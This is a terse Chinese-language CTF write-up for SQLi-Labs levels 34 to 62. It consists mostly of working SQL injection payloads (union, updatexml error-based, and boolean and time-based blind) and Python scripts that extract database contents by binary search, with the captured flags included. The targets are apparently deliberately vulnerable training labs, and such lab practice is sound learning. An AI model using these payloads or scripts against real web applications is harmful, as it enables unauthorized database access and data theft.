SQLILABS 34-61
level 34
十六进制代替 " "里的东西
1 �’union select 1,group_concat(schema_name) from information_schema.schemata #
1 �’union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x63746673686f77 #
level 35
有点直接。。。数字型注入???
?id=-1 union select 1,2,flag4s from ctfshow.flags%23
level 36
emmm
?id=-1�’union select 1,2,flag4s from ctfshow.flags%23
level 37
emmm
-1�’union select 1,2,flag4s from ctfshow.flags#
level 38
emmm
-1�’union select 1,flag4s from ctfshow.flags#
level 39
emmm
?id=-1 union select% 1,2,flag4s from ctfshow.flags%23
level 40
盲注跑脚本就是了
import requests
import time
url = "http://591c712f-cd11-4547-94e0-27df596874e3.challenge.ctf.show:8080/"
result=""
for i in range(1,1290):
head=32
tail=127
while head<tail:
mid=(head+tail)>>1
#?id=100"||if(ascii(substr((seLeCt(group_concat(schema_name))from(information_schema.schemata)),1,1))>9999,1,0)||"0
# payload="?id=100')||if(ascii(substr((seleCt(group_concat(schema_name))from(information_schema.schemata)),{},1))>{},1,0)%23".format(i,mid)
# payload="?id=100')||if(ascii(substr((select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema)='ctfshow'),{},1))>{},1,0)||('0".format(i,mid)
# payload="?id=100')||if(ascii(substr((select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_name)='flags'),{},1))>{},1,0)||('0".format(i,mid)
payload="?id=1') and if(ascii(substr((seLect(flag4s)from(ctfshow.flags)),{},1))>{},1,0)%23".format(i,mid)
# print(url+payload)
r=requests.get(url+payload)
if "Your Username is : Dumb" in r.text:
head=mid+1
else:
tail=mid
if head !=32:
result+=chr(head)
else:
break
print(result)
中间没改,要用的话自己改改
level 41
上面脚本 里面的 ‘) 去掉就行’
level 42
密码处
-1’ union select 1,2,3#
-1’ union select 1,flag4s,3 from ctfshow.flags#
level 43
-1’) union select 1,2,3 #
-1’) union select 1,flag4s,3 from ctfshow.flags#
level 44
admin’ or if(ascii(substr(database(),1,1))>1,sleep(3),0) #
时间盲注。。脚本改一改
level 45
admin’) or 1=1 #
admin’) or if(ascii(substr(database(),1,1))>1,sleep(3),0) #
时间盲注改一改
level 46
报错注入
1 or updatexml(1,concat(0x26,(select left(group_concat(schema_name),30) from information_schema.schemata),0x26),1)#
1 or updatexml(1,concat(0x26,(select right(group_concat(schema_name),30) from information_schema.schemata),0x26),1)#
1 or updatexml(1,concat(0x26,(select right(group_concat(table_name),30) from information_schema.tables where table_schema=‘ctfshow’),0x26),1)#
1 or updatexml(1,concat(0x26,(select right(group_concat(column_name),30) from information_schema.columns where table_name=‘flags’),0x26),1)#
1 or updatexml(1,concat(0x26,(select right(group_concat(flag4s),30) from ctfshow.flags),0x26),1)#
1 or updatexml(1,concat(0x26,(select left(group_concat(flag4s),30) from ctfshow.flags),0x26),1)#
ctfshow{04b1482e-203c-44f1-8bb6-df5b27801821}
level 47
1’or updatexml(1,concat(0x26,(select left(group_concat(schema_name),30) from information_schema.schemata),0x26),1)%23
…
…
…
…
1’ or updatexml(1,concat(0x26,(select right(group_concat(flag4s),30) from ctfshow.flags),0x26),1)%23
1’ or updatexml(1,concat(0x26,(select left(group_concat(flag4s),30) from ctfshow.flags),0x26),1)%23
ctfshow{749b597e-5a51-495b-b92c-1a3accd21bc0}
?sort=1’or if(ascii(substr(database(),1,1))>1,sleep(0.5),0) %23
level 48
import requests
url = "http://ee9f5ee9-1368-4d89-a875-1a44cfdf308e.challenge.ctf.show:8080/?sort=1 and "
result=""
for i in range(1,1290):
head=32
tail=127
while head<tail:
mid=(head+tail)>>1
# payload="if(ascii(substr(database(),{},1))>{},sleep(0.5),0) %23".format(i,mid)
# payload="if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{},1))>{},sleep(1),0) %23".format(i,mid)
# payload="if(ascii(substr((select group_concat(table_name)from information_schema.tables where table_schema='ctftraining'),{},1))>{},sleep(1),0) %23".format(i,mid)
# payload="if(ascii(substr((select group_concat(column_name)from information_schema.columns where table_name='flag'),{},1))>{},sleep(1),0) %23".format(i,mid)
payload="if(ascii(substr((select flag4s from ctfshow.flags),{},1))>{},sleep(0.5),0) %23".format(i,mid)
# print(url+payload)
# start_time=time.time()
r=requests.get(url+payload)
print(url+payload)
#print(r.text)
try:
r = requests.get(url+payload,timeout=0.4)
tail = mid
except:
head = mid + 1
if head !=32:
result+=chr(head)
else:
break
print(result)
ctfshow{6d997ae2-953d-4117-8563-e426fb32bc65}
level 49
时间盲注
1’ and if(ascii(substr((seleCt(group_concat(schema_name))from(information_schema.schemata)),1,1))>2,sleep(0.5),0) %23
贴个脚本,自己改
import requests
url = "http://583bbd02-c708-41eb-86ab-f792729f9843.node4.buuoj.cn/Less-49/?sort=1' and "
result=""
for i in range(1,1290):
head=32
tail=127
while head<tail:
mid=(head+tail)>>1
payload="if(ascii(substr(database(),{},1))>{},sleep(0.5),0) %23".format(i,mid)
# payload="if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{},1))>{},sleep(1),0) %23".format(i,mid)
# payload="if(ascii(substr((select group_concat(table_name)from information_schema.tables where table_schema='ctftraining'),{},1))>{},sleep(1),0) %23".format(i,mid)
# payload="if(ascii(substr((select group_concat(column_name)from information_schema.columns where table_name='flag'),{},1))>{},sleep(1),0) %23".format(i,mid)
# payload="if(ascii(substr((select flag4s from ctfshow.flags),{},1))>{},sleep(0.5),0) %23".format(i,mid)
# print(url+payload)
# start_time=time.time()
r=requests.get(url+payload)
print(url+payload)
#print(r.text)
try:
r = requests.get(url+payload,timeout=0.4)
tail = mid
except:
head = mid + 1
if head !=32:
result+=chr(head)
else:
break
print(result)
level 50
1 or updatexml(1,concat(0x26,(select right(group_concat(flag4s),30) from ctfshow.flags),0x26),1)%23
1 or updatexml(1,concat(0x26,(select left(group_concat(flag4s),30) from ctfshow.flags),0x26),1)%23
ctfshow{0f3c691a-ba65-4f5b-ad46-bc0e58100b9e}
level 51
1’or updatexml(1,concat(0x26,(select right(group_concat(flag4s),30) from ctfshow.flags),0x26),1)%23
1’or updatexml(1,concat(0x26,(select left(group_concat(flag4s),30) from ctfshow.flags),0x26),1)%23
ctfshow{23972c5c-3569-4115-8572-0f754336659a}
level 52
时间盲注
?sort=1 and if(ascii(substr((seleCt(group_concat(schema_name))from(information_schema.schemata)),1,1))>2,sleep(5),0) %23
49那个脚本改一改
level 53
时间盲注脚本跑一跑
?sort=1’ and if(ascii(substr(database(),1,1))>114,sleep(0.5),0) %23
level 54
网上没环境了
用docker搭了个环境自己做
10次机会
先写好语句
id=-1’ union select 1,group_concat(schema_name),3 from information_schema.schemata %23
id=-1’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘challenges’ %23
N4QU4VGMDT
id=-1’ union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘N4QU4VGMDT’ %23
secret_XA5R
?id=-1’union select 1,group_concat(secret_XA5R),3 from challenges.N4QU4VGMDT %23
level 55
?id=-1) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘challenges’%23
?id=-1) union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘RW5TWVFDYU’%23
?id=-1) union select 1,group_concat(secret_O1KM),3 from challenges.RW5TWVFDYU%23
level 56
?id=-1’) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘challenges’%23
MMFDGR6C60
?id=-1’) union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘MMFDGR6C60’%23
secret_ZGCM
?id=-1’) union select 1,group_concat(secret_ZGCM),3 from challenges.MMFDGR6C60%23
level 57
?id=-1" union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘challenges’%23
UCNSDJBA2P
?id=-1" union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘UCNSDJBA2P’%23
secret_7COO
?id=-1" union select 1,group_concat(secret_7COO),3 from challenges.UCNSDJBA2P%23
level 58
没有回显,有报错信息
报错注入
1’ or updatexml(1,concat(0x26,(select right(group_concat(table_name),30) from information_schema.tables where table_schema=‘challenges’),0x26),1)%23
WMYP9VS7T2
1’ or updatexml(1,concat(0x26,(select right(group_concat(column_name),30) from information_schema.columns where table_name=‘WMYP9VS7T2’),0x26),1)%23
secret_YKLV
1’ or updatexml(1,concat(0x26,(select right(group_concat(secret_YKLV),30) from challenges.WMYP9VS7T2),0x26),1)%23
BzE8UovoHobfXoFK5rflIeMo
level 59
?id=1 or updatexml(1,concat(0x26,(select right(group_concat(table_name),30) from information_schema.tables where table_schema=‘challenges’),0x26),1)%23
WZBWCK0O8M
?id=1 or updatexml(1,concat(0x26,(select right(group_concat(column_name),30) from information_schema.columns where table_name=‘WZBWCK0O8M’),0x26),1)%23
secret_CNZ0
?id=1 or updatexml(1,concat(0x26,(select right(group_concat(secret_CNZ0),30) from challenges.WZBWCK0O8M),0x26),1)%23
JeF0NQQk0TXsVJM6MzoPbtiL
level 60
?id=1")or updatexml(1,concat(0x26,(select right(group_concat(table_name),30) from information_schema.tables where table_schema=‘challenges’),0x26),1)%23
IYK33M1WVE
?id=1")or updatexml(1,concat(0x26,(select right(group_concat(column_name),30) from information_schema.columns where table_name=‘IYK33M1WVE’),0x26),1)%23
secret_WL6G
?id=1")or updatexml(1,concat(0x26,(select right(group_concat(secret_WL6G),30) from challenges.IYK33M1WVE),0x26),1)%23
f3Vhf9q9mInCQoAqyOXGCLcy
level 61
?id=1’))or updatexml(1,concat(0x26,(select right(group_concat(table_name),30) from information_schema.tables where table_schema=‘challenges’),0x26),1)%23
UEEUBQKDFE
?id=1’))or updatexml(1,concat(0x26,(select right(group_concat(column_name),30) from information_schema.columns where table_name=‘UEEUBQKDFE’),0x26),1)%23
secret_RMS1
?id=1")or updatexml(1,concat(0x26,(select right(group_concat(secret_RMS1),30) from challenges.UEEUBQKDFE),0x26),1)%23
KnCHCTocAwPG2sToN2wUczxu
level 62
上脚本
S3BCU54QBK
secret_AYW3